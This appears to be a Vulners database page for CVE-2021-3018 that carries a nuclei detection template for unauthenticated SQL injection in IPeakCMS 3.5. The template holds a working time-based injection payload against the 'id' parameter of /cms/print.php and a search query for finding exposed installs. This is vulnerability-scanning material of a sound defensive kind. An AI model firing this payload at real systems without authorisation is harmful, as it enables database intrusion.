Lucene search
K

IPeakCMS 3.5 - SQL Injection

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

IPeakCMS 3.5 has unauthenticated boolean-based SQL injection in /cms/print.php id parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ICS
North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs
25 Jul 202412:00
ics
ATTACKERKB
CVE-2021-3018
5 Jan 202105:15
attackerkb
Circl
CVE-2021-3018
1 Jun 202102:57
circl
CNNVD
Ipeak Ibexwebcms SQL Injection Vulnerability
5 Jan 202100:00
cnnvd
Check Point Advisories
Ipeak Infosystems IbexwebCMS SQL Injection (CVE-2021-3018)
16 Feb 202100:00
checkpoint_advisories
CVE
CVE-2021-3018
5 Jan 202104:37
cve
Cvelist
CVE-2021-3018
5 Jan 202104:37
cvelist
Exploit DB
IPeakCMS 3.5 - Boolean-based blind SQLi
6 Jan 202100:00
exploitdb
EUVD
EUVD-2021-26371
7 Oct 202500:30
euvd
NVD
CVE-2021-3018
5 Jan 202105:15
nvd
Rows per page
id: CVE-2021-3018

info:
  name: IPeakCMS 3.5 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    ipeak Infosystems ibexwebCMS 3.5 contains an unauthenticated Boolean-based SQL injection caused by unsanitized 'id' parameter in /cms/print.php, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
  reference:
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-ipeak-cms-sqli.md
    - https://m4dm0e.github.io/2020/12/07/ipeak-cms-sqli.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3018
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, data tampering, or full database compromise.
  remediation: |
    Apply the latest security patches or update to a version that fixes this vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-3018
    epss-score: 0.19506
    epss-percentile: 0.9704
    cwe-id: CWE-89
    cpe: cpe:2.3:a:ipeak:ipeakcms:3.5:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 2
    vendor: ipeak
    product: ipeakcms
    fofa-query: body="ipeak" && body="3.5"
  tags: cve,cve2021,ipeakcms,cms,sqli,unauth,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /cms/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "ipeak", "webCMS-3.5")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /cms/print.php?id=1%20AND%207334=BENCHMARK(8000000,MD5(0x73636a72)) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'
          - 'status_code == 200'
          - 'contains(body,"onLoad=\"print();\"")'
        condition: and
# digest: 4a0a00473045022100a43b6d204b61732744ca12f634065776bc408a7b45a3ddfe06f29cab519f2d1302202a49932dc9d40dd356fba304b27c7e95278cb71b71368d3746abb7f97b84518e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.19506
17